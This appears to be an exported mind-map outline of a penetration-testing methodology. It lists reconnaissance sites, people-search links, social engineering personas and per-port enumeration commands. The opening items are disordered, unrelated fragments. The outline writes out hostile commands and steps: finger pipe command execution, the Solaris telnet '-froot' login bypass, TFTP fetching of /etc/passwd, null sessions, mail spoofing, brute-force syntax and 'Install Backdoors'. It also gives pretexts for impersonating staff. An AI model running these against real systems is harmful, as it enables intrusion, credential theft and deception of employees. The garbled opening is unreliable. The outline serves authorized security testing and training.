1. inurl:Citrix/AccessPlatform/auth/login.aspx
2. X11 port 6000^ open
2.1. X11 Enumeration
2.1.1. List open windows
2.1.2. Authentication Method
2.1.2.1. Xauth
2.1.2.2. Xhost
2.2. X11 Exploitation
2.2.1. xwd
2.2.1.1. xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xpm
2.2.2. Keystrokes
2.2.2.1. Received
2.2.2.2. Transmitted
2.2.3. Screenshots
2.2.4. xhost +
2.3. Examine Configuration Files
2.3.1. /etc/Xn.hosts
2.3.2. /usr/lib/X11/xdm
2.3.2.1. Untitled
2.3.3. /usr/lib/X11/xdm/xsession
2.3.4. /usr/lib/X11/xdm/xsession-remote
2.3.5. /usr/lib/X11/xdm/xsession.0
2.3.6. /usr/lib/X11/xdm/xdm-config
2.3.6.1. DisplayManager*authorize:on
3. pwdump [-h][-o][-u][-p] machineName
4. Nabil contributed the AS/400 section.
5. Client Side Security
6. Back end files
6.1. .exe / .txt / .doc / .ppt / .pdf / .vbs / .pl / .sh / .bat / .sql / .xls / .mdb / .conf
7. Set objShell = CreateObject("WScript.Shell")
8. Check visible areas for sensitive information.
9. InitialProgram=c:\windows\system32\cmd.exe
10. txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c: \hostlist.txt
11. http://secunia.com/advisories/search/?search=citrix
12. Pre-Inspection Visit - template
13. Network Footprinting (Reconnaissance) The tester would attempt to gather as much information as possible about the selected network. Reconnaissance can take two forms i.e. active and passive. A passive attack is always the best starting point as this would normally defeat intrusion detection systems and other forms of protection etc. afforded to the network. This would usually involve trying to discover publicly available information by utilising a web browser and visiting newsgroups etc. An active form would be more intrusive and may show up in audit logs and may take the form of an attempted DNS zone transfer or a social engineering type of attack.
13.1. Untitled
13.1.1. Authoratitive Bodies
13.1.1.1. IANA - Internet Assigned Numbers Authority
13.1.1.2. ICANN - Internet Corporation for Assigned Names and Numbers.
13.1.1.3. NRO - Number Resource Organisation
13.1.1.4. RIR - Regional Internet Registry
13.1.1.4.1. AFRINIC - African Network Information Centre
13.1.1.4.2. APNIC - Asia Pacific Network Information Centre
13.1.1.4.3. ARIN - American Registry for Internet Numbers
13.1.1.4.4. LACNIC - Latin America & Caribbean Network Information Centre
13.1.1.4.5. RIPE - Reseaux IP Européens—Network Coordination Centre
13.1.2. Websites
13.1.2.1. Central Ops
13.1.2.1.1. Domain Dossier
13.1.2.1.2. Email Dossier
13.1.2.2. DNS Stuff
13.1.2.2.1. Online DNS one-stop shop, with the ability to perform a great deal of disparate DNS type queries.
13.1.2.3. Fixed Orbit
13.1.2.3.1. Autonomous System lookups and other online tools available.
13.1.2.4. Geektools
13.1.2.5. IP2Location
13.1.2.5.1. Allows limited free IP lookups to be performed, displaying geolocation information, ISP details and other pertinent information.
13.1.2.6. Kartoo
13.1.2.6.1. Metasearch engine that visually presents its results.
13.1.2.7. MyIPNeighbors.com
13.1.2.7.1. Excellent site that gives you details of shared domains on the IP queried/ conversely IP to DNS resolution
13.1.2.8. My-IP-Neighbors.com
13.1.2.8.1. Excellent site that can be used if the above is down
13.1.2.9. myipneighbors.net
13.1.2.10. Netcraft
13.1.2.10.1. Online search tool allowing queries for host information.
13.1.2.11. Passive DNS Replication
13.1.2.11.1. Finds shared domains based on supplied IP addresses
13.1.2.11.2. Note: - Website utilised by nmap hostmap.nse script
13.1.2.12. Robtex
13.1.2.12.1. Excellent website allowing DNS and AS lookups to be performed with a graphical display of the results with pointers, A, MX records and AS connectivity displayed.
13.1.2.12.2. Note: - Can be unreliable with old entries (Use CentralOps to verify)
13.1.2.13. Traceroute.org
13.1.2.13.1. Website listing a large number links to online traceroute resources.
13.1.2.14. Wayback Machine
13.1.2.14.1. Stores older versions of websites, making it a good comparison tool and excellent resource for previously removed data.
13.1.2.15. Whois.net
13.1.3. Tools
13.1.3.1. Cheops-ng
13.1.3.2. Country whois
13.1.3.3. Domain Research Tool
13.1.3.4. Firefox Plugins
13.1.3.4.1. AS Number
13.1.3.4.2. Shazou
13.1.3.4.3. Firecat Suite
13.1.3.5. Gnetutil
13.1.3.6. Goolag Scanner
13.1.3.7. Greenwich
13.1.3.8. Maltego
13.1.3.9. GTWhois
13.1.3.10. Sam Spade
13.1.3.11. Smart whois
13.1.3.12. SpiderFoot
13.2. Internet Search
13.2.1. General Information
13.2.1.1. Web Investigator
13.2.1.2. Tracesmart
13.2.1.3. Friends Reunited
13.2.1.4. Ebay - profiles etc.
13.2.2. Financial
13.2.2.1. EDGAR - Company information, including real-time filings. US
13.2.2.2. Google Finance - General Finance Portal
13.2.2.3. Hoovers - Business Intelligence, Insight and Results. US and UK
13.2.2.4. Companies House UK
13.2.2.5. Land Registry UK
13.2.3. Phone book/ Electoral Role Information
13.2.3.1. 123people
13.2.3.1.1. http://www.123people.co.uk/s/firstname+lastname/world
13.2.3.2. 192.com
13.2.3.2.1. Electoral Role Search. UK
13.2.3.3. 411
13.2.3.3.1. Online White Pages and Yellow Pages. US
13.2.3.4. Untitled
13.2.3.4.1. Background Check, Phone Number Lookup, Trace email, Criminal record, Find People, cell phone number search, License Plate Search. US
13.2.3.5. BT.com. UK
13.2.3.5.1. Residential
13.2.3.5.2. Business
13.2.3.6. Pipl
13.2.3.6.1. Untitled
13.2.3.6.2. http://pipl.com/search/?Email=john%40example.com&CategoryID=4&Interface=1
13.2.3.6.3. http://pipl.com/search/?Username=????&CategoryID=5&Interface=1
13.2.3.7. Spokeo
13.2.3.7.1. http://www.spokeo.com/user?q=domain_name
13.2.3.7.2. http://www.spokeo.com/user?q=email_address
13.2.3.8. Yasni
13.2.3.8.1. http://www.yasni.co.uk/index.php?action=search&search=1&sh=&name=firstname+lastname&filter=Keyword
13.2.3.9. Zabasearch
13.2.3.9.1. People Search Engine. US
13.2.4. Generic Web Searching
13.2.4.1. Code Search
13.2.4.2. Forum Entries
13.2.4.3. Google Hacking Database
13.2.4.4. Google
13.2.4.4.1. Email Addresses
13.2.4.4.2. Contact Details
13.2.4.5. Newsgroups/forums
13.2.4.6. Blog Search
13.2.4.6.1. Yammer
13.2.4.6.2. Google Blog Search
13.2.4.6.3. Technorati
13.2.4.6.4. Jaiku
13.2.4.6.5. Present.ly
13.2.4.6.6. Twitter Network Browser
13.2.4.7. Search Engine Comparison/ Aggregator Sites
13.2.4.7.1. Clusty
13.2.4.7.2. Grokker
13.2.4.7.3. Zuula
13.2.4.7.4. Exalead
13.2.4.7.5. Delicious
13.2.5. Metadata Search
13.2.5.1. Untitled
13.2.5.1.1. MetaData Visualisation Sites
13.2.5.1.2. Tools
13.2.5.1.3. Wikipedia Metadata Search
13.2.6. Social/ Business Networks
13.2.6.1. Untitled
13.2.6.1.1. Africa
13.2.6.1.2. Australia
13.2.6.1.3. Belgium
13.2.6.1.4. Holland
13.2.6.1.5. Hungary
13.2.6.1.6. Iran
13.2.6.1.7. Japan
13.2.6.1.8. Korea
13.2.6.1.9. Poland
13.2.6.1.10. Russia
13.2.6.1.11. Sweden
13.2.6.1.12. UK
13.2.6.1.13. US
13.2.6.1.14. Assorted
13.2.7. Resources
13.2.7.1. OSINT
13.2.7.2. International Directory of Search Engines
13.3. DNS Record Retrieval from publically available servers
13.3.1. Types of Information Records
13.3.1.1. SOA Records - Indicates the server that has authority for the domain.
13.3.1.2. MX Records - List of a host’s or domain’s mail exchanger server(s).
13.3.1.3. NS Records - List of a host’s or domain’s name server(s).
13.3.1.4. A Records - An address record that allows a computer name to be translated to an IP address. Each computer has to have this record for its IP address to be located via DNS.
13.3.1.5. PTR Records - Lists a host’s domain name, host identified by its IP address.
13.3.1.6. SRV Records - Service location record.
13.3.1.7. HINFO Records - Host information record with CPU type and operating system.
13.3.1.8. TXT Records - Generic text record.
13.3.1.9. CNAME - A host’s canonical name allows additional names/ aliases to be used to locate a computer.
13.3.1.10. RP - Responsible person for the domain.
13.3.2. Database Settings
13.3.2.1. Version.bind
13.3.2.2. Serial
13.3.2.3. Refresh
13.3.2.4. Retry
13.3.2.5. Expiry
13.3.2.6. Minimum
13.3.3. Sub Domains
13.3.4. Internal IP ranges
13.3.4.1. Reverse DNS for IP Range
13.3.5. Zone Transfer
13.4. Social Engineering
13.4.1. Remote
13.4.1.1. Phone
13.4.1.1.1. Scenarios
13.4.1.1.2. Results
13.4.1.1.3. Contact Details
13.4.1.2. Email
13.4.1.2.1. Scenarios
13.4.1.2.2. Software
13.4.1.2.3. Results
13.4.1.2.4. Contact Details
13.4.1.3. Other
13.4.2. Local
13.4.2.1. Personas
13.4.2.1.1. Name
13.4.2.1.2. Phone
13.4.2.1.3. Email
13.4.2.1.4. Business Cards
13.4.2.2. Contact Details
13.4.2.2.1. Name
13.4.2.2.2. Phone number
13.4.2.2.3. Email
13.4.2.2.4. Room number
13.4.2.2.5. Department
13.4.2.2.6. Role
13.4.2.3. Scenarios
13.4.2.3.1. New IT employee
13.4.2.3.2. Fire Inspector
13.4.2.4. Results
13.4.2.5. Maps
13.4.2.5.1. Satalitte Imagery
13.4.2.5.2. Building layouts
13.4.2.6. Other
13.5. Dumpster Diving
13.5.1. Rubbish Bins
13.5.2. Contract Waste Removal
13.5.3. Ebay ex-stock sales i.e. HDD
13.6. Web Site copy
13.6.1. htttrack
13.6.2. teleport pro
13.6.3. Black Widow
14. Discovery & Probing. Enumeration can serve two distinct purposes in an assessment: OS Fingerprinting Remote applications being served. OS fingerprinting or TCP/IP stack fingerprinting is the process of determining the operating system being utilised on a remote host. This is carried out by analyzing packets received from the host in question. There are two distinct ways to OS fingerprint, actively (i.e. nmap) or passively (i.e. scanrand). Passive OS fingerprinting determines the remote OS utilising the packets received only and does not require any packets to be sent. Active OS fingerprinting is very noisy and requires packets to be sent to the remote host and waits for a reply, (or lack thereof). Disparate OS's respond differently to certain types of packet, (the response is governed by an RFC and any proprietary responses the vendor (notably Microsoft) has enabled within the system) and so custom packets may be sent. Remote applications being served on a host can be determined by an open port on that host. By port scanning it is then possible to build up a picture of what applications are running and tailor the test accordingly.
14.1. Default Port Lists
14.1.1. Windows
14.1.2. *nix
14.2. Enumeration tools and techniques - The vast majority can be used generically, however, certain bespoke application require there own specific toolsets to be used. Default passwords are platform and vendor specific
14.2.1. General Enumeration Tools
14.2.1.1. nmap
14.2.1.1.1. nmap -n -A -PN -p- -T Agressive -iL nmap.targetlist -oX nmap.syn.results.xml
14.2.1.1.2. nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results
14.2.1.1.3. nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results
14.2.1.1.4. nmap -A -sS -PN -n --script:all ip_address --reason
14.2.1.1.5. grep "appears to be up" nmap_saved_filename | awk -F\( '{print $2}' | awk -F\) '{print $1}' > ip_list
14.2.1.2. netcat
14.2.1.2.1. nc -v -n IP_Address port
14.2.1.2.2. nc -v -w 2 -z IP_Address port_range/port_number
14.2.1.3. amap
14.2.1.3.1. amap -bqv 192.168.1.1 80
14.2.1.3.2. amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]
14.2.1.4. xprobe2
14.2.1.4.1. xprobe2 192.168.1.1
14.2.1.5. sinfp
14.2.1.5.1. ./sinfp.pl -i -p
14.2.1.6. nbtscan
14.2.1.6.1. nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>)
14.2.1.7. hping
14.2.1.7.1. hping ip_address
14.2.1.8. scanrand
14.2.1.8.1. scanrand ip_address:all
14.2.1.9. unicornscan
14.2.1.9.1. unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:' ] IP_ADDRESS/ CIDR_NET_MASK: S-E
14.2.1.10. netenum
14.2.1.10.1. netenum network/netmask timeout
14.2.1.11. fping
14.2.1.11.1. fping -a -d hostname/ (Network/Subnet_Mask)
14.2.2. Firewall Specific Tools
14.2.2.1. firewalk
14.2.2.1.1. firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP]
14.2.2.2. ftester
14.2.2.2.1. host 1 ./ftestd -i eth0 -v host 2 ./ftest -f ftest.conf -v -d 0.01 then ./freport ftest.log ftestd.log
14.2.3. Default Passwords (Examine list)
14.2.3.1. Passwords A
14.2.3.2. Passwords B
14.2.3.3. Passwords C
14.2.3.4. Passwords D
14.2.3.5. Passwords E
14.2.3.6. Passwords F
14.2.3.7. Passwords G
14.2.3.8. Passwords H
14.2.3.9. Passwords I
14.2.3.10. Passwords J
14.2.3.11. Passwords K
14.2.3.12. Passwords L
14.2.3.13. Passwords M
14.2.3.14. Passwords N
14.2.3.15. Passwords O
14.2.3.16. Passwords P
14.2.3.17. Passwords R
14.2.3.18. Passwords S
14.2.3.19. Passwords T
14.2.3.20. Passwords U
14.2.3.21. Passwords V
14.2.3.22. Passwords W
14.2.3.23. Passwords X
14.2.3.24. Passwords Y
14.2.3.25. Passwords Z
14.2.3.26. Passwords (Numeric)
14.3. Active Hosts
14.3.1. Open TCP Ports
14.3.2. Closed TCP Ports
14.3.3. Open UDP Ports
14.3.4. Closed UDP Ports
14.3.5. Service Probing
14.3.5.1. SMTP Mail Bouncing
14.3.5.2. Banner Grabbing
14.3.5.2.1. Other
14.3.5.2.2. HTTP
14.3.5.2.3. HTTPS
14.3.5.2.4. SMTP
14.3.5.2.5. POP3
14.3.5.2.6. FTP
14.3.6. ICMP Responses
14.3.6.1. Type 3 (Port Unreachable)
14.3.6.2. Type 8 (Echo Request)
14.3.6.3. Type 13 (Timestamp Request)
14.3.6.4. Type 15 (Information Request)
14.3.6.5. Type 17 (Subnet Address Mask Request)
14.3.6.6. Responses from broadcast address
14.3.7. Source Port Scans
14.3.7.1. TCP/UDP 53 (DNS)
14.3.7.2. TCP 20 (FTP Data)
14.3.7.3. TCP 80 (HTTP)
14.3.7.4. TCP/UDP 88 (Kerberos)
14.3.8. Firewall Assessment
14.3.8.1. Firewalk
14.3.8.2. TCP/UDP/ICMP responses
14.3.9. OS Fingerprint
15. Enumeration
15.1. Daytime port 13 open
15.1.1. nmap nse script
15.1.1.1. daytime
15.2. FTP port 21 open
15.2.1. Fingerprint server
15.2.1.1. telnet ip_address 21 (Banner grab)
15.2.1.2. Run command ftp ip_address
15.2.1.3. [email protected]
15.2.1.4. Check for anonymous access
15.2.1.4.1. ftp ip_addressUsername: anonymous OR anonPassword: [email protected]
15.2.2. Password guessing
15.2.2.1. Hydra brute force
15.2.2.2. medusa
15.2.2.3. Brutus
15.2.3. Examine configuration files
15.2.3.1. ftpusers
15.2.3.2. ftp.conf
15.2.3.3. proftpd.conf
15.2.4. MiTM
15.2.4.1. pasvagg.pl
15.3. SSH port 22 open
15.3.1. Fingerprint server
15.3.1.1. telnet ip_address 22 (banner grab)
15.3.1.2. scanssh
15.3.1.2.1. scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask
15.3.2. Password guessing
15.3.2.1. ssh root@ip_address
15.3.2.2. guess-who
15.3.2.2.1. ./b -l username -h ip_address -p 22 -2 < password_file_location
15.3.2.3. Hydra brute force
15.3.2.4. brutessh
15.3.2.5. Ruby SSH Bruteforcer
15.3.3. Examine configuration files
15.3.3.1. ssh_config
15.3.3.2. sshd_config
15.3.3.3. authorized_keys
15.3.3.4. ssh_known_hosts
15.3.3.5. .shosts
15.3.4. SSH Client programs
15.3.4.1. tunnelier
15.3.4.2. winsshd
15.3.4.3. putty
15.3.4.4. winscp
15.4. Telnet port 23 open
15.4.1. Fingerprint server
15.4.1.1. telnet ip_address
15.4.1.1.1. Common Banner ListOS/BannerSolaris 8/SunOS 5.8Solaris 2.6/SunOS 5.6Solaris 2.4 or 2.5.1/Unix(r) System V Release 4.0 (hostname)SunOS 4.1.x/SunOS Unix (hostname)FreeBSD/FreeBSD/i386 (hostname) (ttyp1)NetBSD/NetBSD/i386 (hostname) (ttyp1)OpenBSD/OpenBSD/i386 (hostname) (ttyp1)Red Hat 8.0/Red Hat Linux release 8.0 (Psyche)Debian 3.0/Debian GNU/Linux 3.0 / hostnameSGI IRIX 6.x/IRIX (hostname)IBM AIX 4.1.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.IBM AIX 4.2.x or 4.3.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.Nokia IPSO/IPSO (hostname) (ttyp0)Cisco IOS/User Access VerificationLivingston ComOS/ComOS - Livingston PortMaster
15.4.1.2. telnetfp
15.4.2. Password Attack
15.4.2.1. Untitled
15.4.2.2. Hydra brute force
15.4.2.3. Brutus
15.4.2.4. telnet -l "-froot" hostname (Solaris 10+)
15.4.3. Examine configuration files
15.4.3.1. /etc/inetd.conf
15.4.3.2. /etc/xinetd.d/telnet
15.4.3.3. /etc/xinetd.d/stelnet
15.5. Sendmail Port 25 open
15.5.1. Fingerprint server
15.5.1.1. telnet ip_address 25 (banner grab)
15.5.2. Mail Server Testing
15.5.2.1. Enumerate users
15.5.2.1.1. VRFY username (verifies if username exists - enumeration of accounts)
15.5.2.1.2. EXPN username (verifies if username is valid - enumeration of accounts)
15.5.2.2. Mail Spoof Test
15.5.2.2.1. HELO anything MAIL FROM: spoofed_address RCPT TO:valid_mail_account DATA . QUIT
15.5.2.3. Mail Relay Test
15.5.2.3.1. Untitled
15.5.3. Examine Configuration Files
15.5.3.1. sendmail.cf
15.5.3.2. submit.cf
15.6. DNS port 53 open
15.6.1. Fingerprint server/ service
15.6.1.1. host
15.6.1.1.1. host [-aCdlnrTwv ] [-c class ] [-N ndots ] [-R number ] [-t type ] [-W wait ] name [server ] -v verbose format -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR. -a Same as –t ANY. -l Zone transfer (if allowed). -f Save to a specified filename.
15.6.1.2. nslookup
15.6.1.2.1. nslookup [ -option ... ] [ host-to-find | - [ server ]]
15.6.1.3. dig
15.6.1.3.1. dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]
15.6.1.4. whois-h Use the named host to resolve the query -a Use ARIN to resolve the query -r Use RIPE to resolve the query -p Use APNIC to resolve the query -Q Perform a quick lookup
15.6.2. DNS Enumeration
15.6.2.1. Bile Suite
15.6.2.1.1. perl BiLE.pl [website] [project_name]
15.6.2.1.2. perl BiLE-weigh.pl [website] [input file]
15.6.2.1.3. perl vet-IPrange.pl [input file] [true domain file] [output file] <range>
15.6.2.1.4. perl vet-mx.pl [input file] [true domain file] [output file]
15.6.2.1.5. perl exp-tld.pl [input file] [output file]
15.6.2.1.6. perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]
15.6.2.1.7. perl qtrace.pl [ip_address_file] [output_file]
15.6.2.1.8. perl jarf-rev [subnetblock] [nameserver]
15.6.2.2. txdns
15.6.2.2.1. txdns -rt -t domain_name
15.6.2.2.2. txdns -x 50 -bb domain_name
15.6.2.3. nmap nse scripts
15.6.2.3.1. dns-random-srcport
15.6.2.3.2. dns-random-txid
15.6.2.3.3. dns-recursion
15.6.2.3.4. dns-zone-transfer
15.6.3. Examine Configuration Files
15.6.3.1. host.conf
15.6.3.2. resolv.conf
15.6.3.3. named.conf
15.7. TFTP port 69 open
15.7.1. TFTP Enumeration
15.7.1.1. tftp ip_address PUT local_file
15.7.1.2. tftp ip_address GET conf.txt (or other files)
15.7.1.3. Solarwinds TFTP server
15.7.1.4. tftp – i <IP> GET /etc/passwd (old Solaris)
15.7.2. TFTP Bruteforcing
15.7.2.1. TFTP bruteforcer
15.7.2.2. Cisco-Torch
15.8. Finger Port 79 open
15.8.1. User enumeration
15.8.1.1. finger 'a b c d e f g h' @example.com
15.8.1.2. finger [email protected]
15.8.1.3. finger [email protected]
15.8.1.4. finger [email protected]
15.8.1.5. finger [email protected]
15.8.1.6. finger **@example.com
15.8.1.7. finger [email protected]
15.8.1.8. finger @example.com
15.8.1.9. nmap nse script
15.8.1.9.1. finger
15.8.2. Command execution
15.8.2.1. finger "|/bin/[email protected]"
15.8.2.2. finger "|/bin/ls -a /@example.com"
15.8.3. Finger Bounce
15.8.3.1. finger user@host@victim
15.8.3.2. finger @internal@external
15.9. Web Ports 80,8080 etc. open
15.9.1. Fingerprint server
15.9.1.1. Telnet ip_address port
15.9.1.2. Firefox plugins
15.9.1.2.1. All
15.9.1.2.2. Specific
15.9.2. Crawl website
15.9.2.1. lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source
15.9.2.2. httprint
15.9.2.3. Metagoofil
15.9.2.3.1. metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html
15.9.3. Web Directory enumeration
15.9.3.1. Nikto
15.9.3.1.1. nikto [-h target] [options]
15.9.3.2. DirBuster
15.9.3.3. Wikto
15.9.3.4. Goolag Scanner
15.9.4. Vulnerability Assessment
15.9.4.1. Manual Tests
15.9.4.1.1. Default Passwords
15.9.4.1.2. Install Backdoors
15.9.4.1.3. Method Testing
15.9.4.1.4. Upload Files
15.9.4.1.5. View Page Source
15.9.4.1.6. Input Validation Checks
15.9.4.1.7. Automated table and column iteration
15.9.4.2. Vulnerability Scanners
15.9.4.2.1. Acunetix
15.9.4.2.2. Grendelscan
15.9.4.2.3. NStealth
15.9.4.2.4. Obiwan III
15.9.4.2.5. w3af
15.9.4.3. Specific Applications/ Server Tools
15.9.4.3.1. Domino
15.9.4.3.2. Joomla
15.9.4.3.3. aspaudit.pl
15.9.4.3.4. Vbulletin
15.9.4.3.5. ZyXel
15.9.5. Proxy Testing
15.9.5.1. Burpsuite
15.9.5.2. Crowbar
15.9.5.3. Interceptor
15.9.5.4. Paros
15.9.5.5. Requester Raw
15.9.5.6. Suru
15.9.5.7. WebScarab
15.9.6. Examine configuration files
15.9.6.1. Generic
15.9.6.1.1. Examine httpd.conf/ windows config files
15.9.6.2. JBoss
15.9.6.2.1. JMX Console http://<IP>:8080/jmxconcole/
15.9.6.3. Joomla
15.9.6.3.1. configuration.php
15.9.6.3.2. diagnostics.php
15.9.6.3.3. joomla.inc.php
15.9.6.3.4. config.inc.php
15.9.6.4. Mambo
15.9.6.4.1. configuration.php
15.9.6.4.2. config.inc.php
15.9.6.5. Wordpress
15.9.6.5.1. setup-config.php
15.9.6.5.2. wp-config.php
15.9.6.6. ZyXel
15.9.6.6.1. /WAN.html (contains PPPoE ISP password)
15.9.6.6.2. /WLAN_General.html and /WLAN.html (contains WEP key)
15.9.6.6.3. /rpDyDNS.html (contains DDNS credentials)
15.9.6.6.4. /Firewall_DefPolicy.html (Firewall)
15.9.6.6.5. /CF_Keyword.html (Content Filter)
15.9.6.6.6. /RemMagWWW.html (Remote MGMT)
15.9.6.6.7. /rpSysAdmin.html (System)
15.9.6.6.8. /LAN_IP.html (LAN)
15.9.6.6.9. /NAT_General.html (NAT)
15.9.6.6.10. /ViewLog.html (Logs)
15.9.6.6.11. /rpFWUpload.html (Tools)
15.9.6.6.12. /DiagGeneral.html (Diagnostic)
15.9.6.6.13. /RemMagSNMP.html (SNMP Passwords)
15.9.6.6.14. /LAN_ClientList.html (Current DHCP Leases)
15.9.6.6.15. Config Backups
15.9.7. Examine web server logs
15.9.7.1. c:\winnt\system32\Logfiles\W3SVC1
15.9.7.1.1. awk -F " " '{print $3,$11} filename | sort | uniq
15.9.8. References
15.9.8.1. White Papers
15.9.8.1.1. Cross Site Request Forgery: An Introduction to a Common Web Application Weakness
15.9.8.1.2. Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity
15.9.8.1.3. Blind Security Testing - An Evolutionary Approach
15.9.8.1.4. Command Injection in XML Signatures and Encryption
15.9.8.1.5. Input Validation Cheat Sheet
15.9.8.1.6. SQL Injection Cheat Sheet
15.9.8.2. Books
15.9.8.2.1. Hacking Exposed Web 2.0
15.9.8.2.2. Hacking Exposed Web Applications
15.9.8.2.3. The Web Application Hacker's Handbook
15.9.9. Exploit Frameworks
15.9.9.1. Brute-force Tools
15.9.9.1.1. Acunetix
15.9.9.2. Metasploit
15.9.9.3. w3af
15.10. Portmapper port 111 open
15.10.1. rpcdump.py
15.10.1.1. rpcdump.py username:password@IP_Address port/protocol (i.e. 80/HTTP)
15.10.2. rpcinfo
15.10.2.1. rpcinfo [options] IP_Address
15.11. NTP Port 123 open
15.11.1. NTP Enumeration
15.11.1.1. ntpdc -c monlist IP_ADDRESS
15.11.1.2. ntpdc -c sysinfo IP_ADDRESS
15.11.1.3. ntpq
15.11.1.3.1. host
15.11.1.3.2. hostname
15.11.1.3.3. ntpversion
15.11.1.3.4. readlist
15.11.1.3.5. version
15.11.2. Examine configuration files
15.11.2.1. ntp.conf
15.11.3. nmap nse script
15.11.3.1. ntp-info
15.12. NetBIOS Ports 135-139,445 open
15.12.1. NetBIOS enumeration
15.12.1.1. Enum
15.12.1.1.1. enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>
15.12.1.2. Null Session
15.12.1.2.1. net use \\192.168.1.1\ipc$ "" /u:""
15.12.1.3. Smbclient
15.12.1.3.1. smbclient -L //server/share password options
15.12.1.4. Superscan
15.12.1.4.1. Enumeration tab.
15.12.1.5. user2sid/sid2user
15.12.1.6. Winfo
15.12.2. NetBIOS brute force
15.12.2.1. Hydra
15.12.2.2. Brutus
15.12.2.3. Cain & Abel
15.12.2.4. getacct
15.12.2.5. NAT (NetBIOS Auditing Tool)
15.12.3. Examine Configuration Files
15.12.3.1. Smb.conf
15.12.3.2. lmhosts
15.13. SNMP port 161 open
15.13.1. Default Community Strings
15.13.1.1. public
15.13.1.2. private
15.13.1.3. cisco
15.13.1.3.1. cable-docsis
15.13.1.3.2. ILMI
15.13.2. MIB enumeration
15.13.2.1. Windows NT
15.13.2.1.1. .1.3.6.1.2.1.1.5 Hostnames
15.13.2.1.2. .1.3.6.1.4.1.77.1.4.2 Domain Name
15.13.2.1.3. .1.3.6.1.4.1.77.1.2.25 Usernames
15.13.2.1.4. .1.3.6.1.4.1.77.1.2.3.1.1 Running Services
15.13.2.1.5. .1.3.6.1.4.1.77.1.2.27 Share Information
15.13.2.2. Solarwinds MIB walk
15.13.2.3. Getif
15.13.2.4. snmpwalk
15.13.2.4.1. snmpwalk -v <Version> -c <Community string> <IP>
15.13.2.5. Snscan
15.13.2.6. Applications
15.13.2.6.1. ZyXel
15.13.2.7. nmap nse script
15.13.2.7.1. snmp-sysdescr
15.13.3. SNMP Bruteforce
15.13.3.1. onesixtyone
15.13.3.1.1. onesixytone -c SNMP.wordlist <IP>
15.13.3.2. cat
15.13.3.2.1. ./cat -h <IP> -w SNMP.wordlist
15.13.3.3. Solarwinds SNMP Brute Force
15.13.3.4. ADMsnmp
15.13.3.5. nmap nse script
15.13.3.5.1. snmp-brute
15.13.4. Examine SNMP Configuration files
15.13.4.1. snmp.conf
15.13.4.2. snmpd.conf
15.13.4.3. snmp-config.xml
15.14. LDAP Port 389 Open
15.14.1. ldap enumeration
15.14.1.1. ldapminer
15.14.1.1.1. ldapminer -h ip_address -p port (not required if default) -d
15.14.1.2. luma
15.14.1.2.1. Gui based tool
15.14.1.3. ldp
15.14.1.3.1. Gui based tool
15.14.1.4. openldap
15.14.1.4.1. ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]
15.14.1.4.2. ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
15.14.1.4.3. ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]
15.14.1.4.4. ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
15.14.1.4.5. ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]
15.14.2. ldap brute force
15.14.2.1. bf_ldap
15.14.2.1.1. bf_ldap -s server -d domain name -u|-U username | users list file name -L|-l passwords list | length of passwords to generate optional: -p port (default 389) -v (verbose mode) -P Ldap user path (default ,CN=Users,)
15.14.2.2. K0ldS
15.14.2.3. LDAP_Brute.pl
15.14.3. Examine Configuration Files
15.14.3.1. General
15.14.3.1.1. containers.ldif
15.14.3.1.2. ldap.cfg
15.14.3.1.3. ldap.conf
15.14.3.1.4. ldap.xml
15.14.3.1.5. ldap-config.xml
15.14.3.1.6. ldap-realm.xml
15.14.3.1.7. slapd.conf
15.14.3.2. IBM SecureWay V3 server
15.14.3.2.1. V3.sas.oc
15.14.3.3. Microsoft Active Directory server
